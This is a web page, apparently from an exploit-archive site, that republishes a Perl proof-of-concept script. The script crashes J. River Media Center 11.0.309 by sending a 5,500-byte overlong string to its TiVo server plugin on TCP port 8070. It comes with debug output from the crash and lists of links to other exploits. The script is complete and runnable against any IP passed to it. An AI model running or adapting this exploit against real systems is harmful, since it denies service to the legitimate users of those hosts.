exploits , vulnerabilities , articles , J. River Media Center 11.0.309 Remote Denial of Service PoC

2007-04-12 Joomla Component mosMedia <= 1.0.8 Remote File Inclusion Vulnerability
2007-04-12 Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities
2007-03-30 CA BrightStor Backup 11.5.2.0 (Mediasvr.exe) Remote Code Exploit
2006-08-18 Macromedia Flash 9 (IE Plugin) Remote Denial of Service Crash Exploit
2006-02-22 Microsoft Windows Media Player Plugin Remote Code Execution Exploit (MS06-006) #3

2006-09-05

J. River Media Center 11.0.309 Remote Denial of Service PoC

Rated as : High Risk

#!/usr/bin/perl
##Credit to n00b for finding this bug..^ ^
############################################################################
#Media Center 11 d0s exploit overly long string.
#TiVo server plugin..Runs on port tcp :8070
#Also J. River UPnP Server Version 1.0.34
#is also afected by the same bug which is just a
#dos exploit.As we know the port always changes for the
#UPnP server so you may have to modify the proof of concept a little
#This exploit will deny legitimate user's from using the service
#We should see a error with the following msg Upon sucsessfull
exploitation.
#All 3 of the server plugin's will fail includin the library server which
#is set to port :80 by default.The only debug info i was able to collect
#at crash time is also provided with the proof of concept.
#As you can see from the debug info provided we canot control any memory
#Adresses.
#Shout's to aelph and every-one who has helped me over the year's.
#############################################################################
#   X  Microsoft Visual C ++ Runtime Library
#
#   Buffer overrun detected!
#
#   C:\Program Files\J River\Media Center 11\Media center.exe
#
#   A Buffer overrun has been detected which has corrupted the program's
#   internal state. The program cannot safely continue execution and must
#   be now terminated.
#                                                   Bah fucking shame..
##############################################################################
#o/s info: win xp sp.2  Media Center 11.0.309 (not registered)
#                       \\ DEBUG INFO //
#
#eax=77c26ed2 ebx=00000000 ecx=77c1129c edx=00000000 esi=77f7663e
edi=00000003
#eip=7ffe0304 esp=01b7e964 ebp=01b7ea5c iopl=0         nv up ei pl nz na
pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000            
efl=00000202
#SharedUserData!SystemCallStub+0x4:
#7ffe0304 c3               ret
##############################################################################

print "Media Center 11.0.309 Remote d0s J River TiVo server all 3
plugin's are vuln by n00b \n";

use IO::Socket;

$ip = $ARGV[0];

$payload = "\x41"x5500;

if(!$ip)
{

die "you forgot the ip dumb nut\n";

}

$port = '8070';

$protocol = 'tcp';


$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                               PeerPort=>$port,
                               Proto=>$protocol,
                               Timeout=>'1') || die "Make sure
service is running on the port\n";


print $socket $payload;

close($socket);


securitydot.net - 2006-09-05

Exploits - newest 10 RSS | More

2007-06-15 57270 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34201 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42419 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29329 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19769 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16706 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19404 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16590 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33606 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17231 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit